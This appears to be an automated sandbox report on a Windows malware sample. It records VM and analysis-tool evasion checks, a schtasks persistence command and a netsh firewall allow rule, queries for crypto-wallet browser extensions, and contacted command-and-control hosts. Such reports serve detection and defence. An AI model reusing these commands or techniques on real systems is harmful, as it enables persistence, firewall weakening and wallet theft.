Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Queries sensitive battery information (via WMI, Win32_Battery, often done to detect virtual machines)
Source: C:\5p9SnCM5jV\ybtrrus.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Battery
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: ybtrrus.exe, 00000005.00000002.3343611670.000000000545A000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: PROCESSHACKER.EXE
Source: ybtrrus.exe, 00000005.00000002.3343611670.000000000545A000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: PROCMON.EXE
Source: ybtrrus.exe, 00000005.00000002.3343611670.000000000545A000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: HOOKEXPLORER.EXE
Source: ybtrrus.exe, 00000005.00000002.3343611670.000000000545A000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: AUTORUNSC.EXE
Source: ybtrrus.exe, 00000005.00000002.3343611670.000000000545A000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: OLLYDBG.EXE
Source: ybtrrus.exe, 00000005.00000002.3343611670.000000000545A000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: X64DBG.EXE
Source: ybtrrus.exe, 00000005.00000002.3343611670.000000000545A000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: REGMON.EXE
Source: ybtrrus.exe, 00000005.00000002.3343611670.000000000545A000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: WINDBG.EXE
Source: ybtrrus.exe, 00000005.00000002.3343611670.000000000545A000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: AUTORUNS.EXE
Source: ybtrrus.exe, 00000005.00000002.3343611670.000000000545A000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: IMPORTREC.EXE
Source: ybtrrus.exe, 00000005.00000002.3343611670.000000000545A000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: PETOOLS.EXE
Source: ybtrrus.exe, 00000005.00000002.3343611670.000000000545A000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: PROC_ANALYZER.EXE
Source: ybtrrus.exe, 00000005.00000002.3343611670.000000000545A000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: SNIFF_HIT.EXE
Source: ybtrrus.exe, 00000005.00000002.3343611670.000000000545A000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: FIDDLER.EXE
Source: ybtrrus.exe, 00000005.00000002.3343611670.000000000545A000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: IDAQ.EXE
Source: ybtrrus.exe, 00000005.00000002.3343611670.000000000545A000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: SYSANALYZER.EXE
Source: ybtrrus.exe, 00000005.00000002.3343611670.000000000545A000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: DUMPCAP.EXE
Source: ybtrrus.exe, 00000005.00000002.3343611670.000000000545A000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: WIRESHARK.EXE
Source: ybtrrus.exe, 00000005.00000002.3343611670.000000000545A000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: FILEMON.EXE
Found evasive API chain (may stop execution after checking a module file name)
Source: C:\5p9SnCM5jV\ybtrrus.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe API coverage: 2.6 %
Source: C:\temp333\install_2.dll API coverage: 6.3 %
Source: C:\5p9SnCM5jV\ybtrrus.exe API coverage: 0.6 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe TID: 1340 Thread sleep time: -60000s >= -30000s Jump to behavior
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\5p9SnCM5jV\ybtrrus.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\temp333\install_2.dll Code function: 2_2_6D371F00 CloseHandle,memset,FindFirstFileW,FindClose, 2_2_6D371F00
Source: C:\temp333\install_2.dll Code function: 2_2_6D3716F0 memcpy,memcpy,memset,FindFirstFileW,memcpy,GetLastError, 2_2_6D3716F0
Source: C:\5p9SnCM5jV\ybtrrus.exe Code function: 5_2_6CAAC2D0 FindFirstFileW,GetLastError,FindNextFileW,GetLastError,FindFirstFileA,GetLastError,FindNextFileA,GetLastError, 5_2_6CAAC2D0
Source: C:\temp333\install_2.dll Code function: 2_2_6D35EE1C GetSystemInfo,CreateFileMappingW,MapViewOfFile,VirtualAlloc,VirtualFree,UnmapViewOfFile,CloseHandle,CloseHandle, 2_2_6D35EE1C
Source: Amcache.hve.21.dr Binary or memory string: VMware
Source: Amcache.hve.21.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.21.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.21.dr Binary or memory string: VMware, Inc.
Source: Q0cWJo6Jvh.exe, 00000000.00000002.3340070385.00000279C7330000.00000004.00000020.00020000.00000000.sdmp, Q0cWJo6Jvh.exe, 00000000.00000003.2724781063.00000279C732E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWp
Source: Amcache.hve.21.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.21.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.21.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.21.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.21.dr Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
Source: Q0cWJo6Jvh.exe, 00000000.00000003.2724259278.00000279C737B000.00000004.00000020.00020000.00000000.sdmp, Q0cWJo6Jvh.exe, 00000000.00000003.2120699495.00000279C737B000.00000004.00000020.00020000.00000000.sdmp, Q0cWJo6Jvh.exe, 00000000.00000003.2724705097.00000279C737B000.00000004.00000020.00020000.00000000.sdmp, Q0cWJo6Jvh.exe, 00000000.00000003.2177915595.00000279C737B000.00000004.00000020.00020000.00000000.sdmp, install_2.dll Binary or memory string: Hyper-V RAW
Source: ybtrrus.exe, 0000000E.00000002.2708285631.0000000000F49000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: Amcache.hve.21.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Q0cWJo6Jvh.exe, 00000000.00000003.2724259278.00000279C737B000.00000004.00000020.00020000.00000000.sdmp, Q0cWJo6Jvh.exe, 00000000.00000003.2120699495.00000279C737B000.00000004.00000020.00020000.00000000.sdmp, Q0cWJo6Jvh.exe, 00000000.00000003.2724705097.00000279C737B000.00000004.00000020.00020000.00000000.sdmp, Q0cWJo6Jvh.exe, 00000000.00000003.2177915595.00000279C737B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW(
Source: Amcache.hve.21.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.21.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Q0cWJo6Jvh.exe, 00000000.00000002.3340799261.00000279C737E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW!
Source: Amcache.hve.21.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: install_2.dll, 00000002.00000002.3340085430.0000000000468000.00000004.00000020.00020000.00000000.sdmp, install_2.dll, 00000002.00000003.2301910103.0000000000468000.00000004.00000020.00020000.00000000.sdmp, install_2.dll, 00000002.00000003.2295263360.0000000000469000.00000004.00000020.00020000.00000000.sdmp, install_2.dll, 00000002.00000003.2492012422.0000000000460000.00000004.00000020.00020000.00000000.sdmp, install_2.dll, 00000002.00000003.2491087856.0000000000460000.00000004.00000020.00020000.00000000.sdmp, install_2.dll, 00000002.00000003.2491302357.0000000000460000.00000004.00000020.00020000.00000000.sdmp, install_2.dll, 00000002.00000003.2491545059.0000000000460000.00000004.00000020.00020000.00000000.sdmp, install_2.dll, 00000002.00000003.2493125053.0000000000460000.00000004.00000020.00020000.00000000.sdmp, install_2.dll, 00000002.00000003.2302037944.0000000000468000.00000004.00000020.00020000.00000000.sdmp, install_2.dll, 00000002.00000003.2491754042.0000000000460000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: ybtrrus.exe, 00000005.00000002.3362412952.0000000006CEF000.00000002.00000001.01000000.00000009.sdmp Binary or memory string: 4HGFs
Source: ybtrrus.exe, 0000000E.00000002.2708285631.0000000000F84000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}J
Source: Amcache.hve.21.dr Binary or memory string: vmci.sys
Source: ybtrrus.exe, 00000005.00000002.3340950977.0000000001063000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll{
Source: Amcache.hve.21.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.21.dr Binary or memory string: \driver\vmci,\driver\pci
Source: ybtrrus.exe, 0000000E.00000003.2591527695.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: Amcache.hve.21.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.21.dr Binary or memory string: VMware20,1
Source: Amcache.hve.21.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.21.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.21.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: 0101a.zip.2.dr Binary or memory string: x3HgFs
Source: Amcache.hve.21.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.21.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.21.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.21.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.21.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.21.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.21.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: ybtrrus.exe, 0000000E.00000002.2708285631.0000000000F49000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0
Source: Amcache.hve.21.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\5p9SnCM5jV\ybtrrus.exe API call chain: ExitProcess graph end node
Source: C:\5p9SnCM5jV\ybtrrus.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF7798409B0 free,IsDebuggerPresent,RaiseException, 0_2_00007FF7798409B0
Contains functionality to dynamically determine API calls
Source: C:\temp333\install_2.dll Code function: 2_2_6D1D27E0 DllMain,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 2_2_6D1D27E0
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\temp333\install_2.dll Code function: 2_2_6D39BA00 GetProcessHeap,HeapAlloc, 2_2_6D39BA00
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF779821180 Sleep,Sleep,SetUnhandledExceptionFilter,_set_invalid_parameter_handler,malloc,strlen,malloc,memcpy,_initterm, 0_2_00007FF779821180
Source: C:\temp333\install_2.dll Code function: 2_2_6D39599F IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_6D39599F
Source: C:\5p9SnCM5jV\ybtrrus.exe Code function: 5_2_6CAB9D73 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 5_2_6CAB9D73
Source: C:\5p9SnCM5jV\ybtrrus.exe Code function: 5_2_6CABF0D4 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 5_2_6CABF0D4
Source: C:\5p9SnCM5jV\ybtrrus.exe Code function: 5_2_6CAC13E1 _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind, 5_2_6CAC13E1
Source: C:\temp333\install_2.dll Memory allocated: page read and write | page guard Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\temp333\install_2.dll Process created: C:\5p9SnCM5jV\ybtrrus.exe "C:\5p9SnCM5jV\ybtrrus.exe" Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Query /TN "Boomer" Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C SCHTASKS /Create /F /RL HIGHEST /TN "Boomer" /TR "C:\5p9SnCM5jV\ybtrrus.exe" /SC ONLOGON /DELAY 0001:00 Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C netsh advfirewall firewall add rule name="ybtrrus" dir=in action=allow program="C:\5p9SnCM5jV\ybtrrus.exe" enable=yes profile=any Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Create /F /RL HIGHEST /TN "Boomer" /TR "C:\5p9SnCM5jV\ybtrrus.exe" /SC ONLOGON /DELAY 0001:00 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="ybtrrus" dir=in action=allow program="C:\5p9SnCM5jV\ybtrrus.exe" enable=yes profile=any Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /flushdns Jump to behavior
Source: ybtrrus.exe, 00000005.00000002.3372050029.000000000768F000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: ybtrrus.exe, 00000005.00000002.3372050029.0000000007696000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: PROGRAM MANAGERBOXOCR.EXE)
Source: ybtrrus.exe, 00000005.00000002.3372050029.000000000768F000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Program ManagerQ!i
Source: ybtrrus.exe, 00000005.00000002.3372050029.000000000768F000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Program Manager1#i
Source: ybtrrus.exe, 00000005.00000002.3372050029.000000000768F000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Program ManagerQ$i
Source: ybtrrus.exe, 00000005.00000002.3374122205.00000000093BB000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: )Program Managerboxocr.exe)WindowClass.0
Source: ybtrrus.exe, 00000005.00000002.3343611670.0000000005E5A000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: Shell_TrayWndStartU
Source: ybtrrus.exe, 00000005.00000002.3343611670.0000000005E5A000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: Shell_TrayWndReBarWindow32MSTaskSwWClassToolbarWindow32U
Source: ybtrrus.exe, 00000005.00000002.3374122205.00000000093BB000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: Program Manager;X
Source: ybtrrus.exe, 00000005.00000002.3372050029.000000000768F000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Program Managera i
Source: ybtrrus.exe, 00000005.00000002.3372050029.000000000768F000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Program Manager!!i
Source: ybtrrus.exe, 00000005.00000002.3372050029.000000000768F000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Program Manager@
Source: ybtrrus.exe, 00000005.00000002.3343611670.0000000005E5A000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: Shell_TrayWndU
Contains functionality to query CPU information (cpuid)
Source: C:\temp333\install_2.dll Code function: 2_2_6D359920 cpuid 2_2_6D359920
Contains functionality to query locales information (e.g. system language)
Source: C:\5p9SnCM5jV\ybtrrus.exe Code function: GetLocaleInfoA, 5_2_6CAC2D4C
Source: C:\5p9SnCM5jV\ybtrrus.exe Code function: GetLocaleInfoA, 14_2_004144B0
Queries the volume information (name, serial number etc) of a device
Source: C:\temp333\install_2.dll Queries volume information: C:\5p9SnCM5jV\0101a.zip VolumeInformation Jump to behavior
Source: C:\temp333\install_2.dll Queries volume information: C:\5p9SnCM5jV\0101a_decrypted.zip VolumeInformation Jump to behavior
Source: C:\temp333\install_2.dll Queries volume information: C:\5p9SnCM5jV VolumeInformation Jump to behavior
Source: C:\temp333\install_2.dll Queries volume information: C:\5p9SnCM5jV VolumeInformation Jump to behavior
Source: C:\temp333\install_2.dll Queries volume information: C:\5p9SnCM5jV VolumeInformation Jump to behavior
Source: C:\temp333\install_2.dll Queries volume information: C:\5p9SnCM5jV VolumeInformation Jump to behavior
Source: C:\temp333\install_2.dll Queries volume information: C:\5p9SnCM5jV VolumeInformation Jump to behavior
Source: C:\temp333\install_2.dll Queries volume information: C:\5p9SnCM5jV VolumeInformation Jump to behavior
Source: C:\temp333\install_2.dll Queries volume information: C:\5p9SnCM5jV VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF77983D6C0 GetSystemTimeAsFileTime, 0_2_00007FF77983D6C0
Source: C:\5p9SnCM5jV\ybtrrus.exe Code function: 5_2_6CAC070D InitializeCriticalSectionAndSpinCount,GetVersion, 5_2_6CAC070D

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Modifies the windows firewall
Source: C:\5p9SnCM5jV\ybtrrus.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C netsh advfirewall firewall add rule name="ybtrrus" dir=in action=allow program="C:\5p9SnCM5jV\ybtrrus.exe" enable=yes profile=any
Uses netsh to modify the Windows network and firewall settings
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="ybtrrus" dir=in action=allow program="C:\5p9SnCM5jV\ybtrrus.exe" enable=yes profile=any
AV process strings found (often used to terminate AV products)
Source: ybtrrus.exe, 00000005.00000002.3343611670.000000000545A000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: procmon.exe
Source: ybtrrus.exe, 00000005.00000002.3343611670.000000000545A000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: tcpview.exe
Source: Amcache.hve.21.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: ybtrrus.exe, 00000005.00000002.3343611670.000000000545A000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: Wireshark.exe
Source: Amcache.hve.21.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.21.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.21.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: ybtrrus.exe, 00000005.00000002.3343611670.000000000545A000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: procexp.exe
Source: ybtrrus.exe, 00000005.00000002.3343611670.000000000545A000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: LordPE.exe
Source: ybtrrus.exe, 00000005.00000002.3343611670.000000000545A000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: autoruns.exe
Source: Amcache.hve.21.dr Binary or memory string: MsMpEng.exe
Source: ybtrrus.exe, 00000005.00000002.3343611670.000000000545A000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: ollydbg.exe
Source: ybtrrus.exe, 00000005.00000002.3343611670.000000000545A000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: regmon.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\5p9SnCM5jV\ybtrrus.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information
barindex
Tries to access browser extension known for cryptocurrency wallets
Source: C:\5p9SnCM5jV\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nkbihfbeogaeaoehlefnkodbefgpgknn Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hnfanknocfeofbddgcijnmhnfnkdnaad Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\bfnaelmomeimhlpmgjnjophhpkkoljpa Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\lpfcbjknijpeeillifnkikgncikgfhdo Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\kpfopkelmapcoipemfendmdcghnegimn Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aeachknmefphepccionboohckonoeemg Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\jbdaocneiiinmjbjlgalhcelgbejmnid Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\kncchdigobghenbbaddojjnnaogfppfj Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\amkmjjmmflddogmhpjloimipbofnfjih Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nlbmnnijcnlegkjjpcfjclmcfggfefdm Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nanjmdknhkinifnkgdcggcfnhdaammmj Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ibnejdfjmmkpcnlpebklmnkoeoihofec Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnjhmkhhmkbjkkabndcnnogagogbneec Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\fhbohimaelbohpjbbldcngcnapndodjp Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\afbcbjpbpfadlkmhmclhkeeodmamcflc Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\cjelfplplebdjjenllpjcblmjkfcffne Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\fihkakfobkmkjojpchpfgcmhfjnmnfpi Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ffnbelfdoeiohenkjibnmadjiehjhajb Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hpglfhgfnhbgpjdenjgmdgoeiappafln Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blnieiiffboillknjnepogjhkgnoapac Jump to behavior
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\temp333\install_2.dll Code function: 2_2_6D37C9A0 getsockname,WSAGetLastError,bind,WSAGetLastError,closesocket, 2_2_6D37C9A0
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1528439 Sample: Q0cWJo6Jvh.exe Startdate: 07/10/2024 Architecture: WINDOWS Score: 80 54 worldtimeapi.org 2->54 56 time.nist.gov 2->56 58 2 other IPs or domains 2->58 68 Sigma detected: Invoke-Obfuscation CLIP+ Launcher 2->68 70 AI detected suspicious sample 2->70 72 Sigma detected: Invoke-Obfuscation VAR+ Launcher 2->72 10 Q0cWJo6Jvh.exe 3 2->10         started        14 ybtrrus.exe 5 2->14         started        signatures3 process4 dnsIp5 66 147.45.116.5, 49699, 49700, 80 FREE-NET-ASFREEnetEU Russian Federation 10->66 50 C:\temp333\install_2.dll, PE32 10->50 dropped 52 C:\temp333\g2m.dll, PE32 10->52 dropped 16 install_2.dll 9 10->16         started        19 WerFault.exe 19 16 14->19         started        file6 process7 file8 48 C:\5p9SnCM5jV\7zxa.dll, PE32 16->48 dropped 21 ybtrrus.exe 1 7 16->21         started        process9 dnsIp10 60 tgb5f522c40.servegame.com 208.76.221.217 WCITUS United States 21->60 62 ntp1.glb.nist.gov 132.163.97.3 US-NATIONAL-INSTITUTE-OF-STANDARDS-AND-TECHNOLOGYUS United States 21->62 64 worldtimeapi.org 213.188.196.246 TELIA-NORWAY-ASTeliaNorwayCoreNetworksNO Italy 21->64 74 Queries sensitive battery information (via WMI, Win32_Battery, often done to detect virtual machines) 21->74 76 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 21->76 78 Uses schtasks.exe or at.exe to add and modify task schedules 21->78 80 2 other signatures 21->80 25 cmd.exe 1 21->25         started        28 cmd.exe 1 21->28         started        30 cmd.exe 1 21->30         started        32 schtasks.exe 1 21->32         started        signatures11 process12 signatures13 82 Uses netsh to modify the Windows network and firewall settings 25->82 84 Uses ipconfig to lookup or modify the Windows network settings 25->84 34 conhost.exe 25->34         started        36 schtasks.exe 1 25->36         started        38 conhost.exe 28->38         started        40 netsh.exe 2 28->40         started        42 conhost.exe 30->42         started        44 ipconfig.exe 1 30->44         started        46 conhost.exe 32->46         started        process14
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
213.188.196.246
 worldtimeapi.org Italy
25400 TELIA-NORWAY-ASTeliaNorwayCoreNetworksNO false
147.45.116.5
 unknown Russian Federation
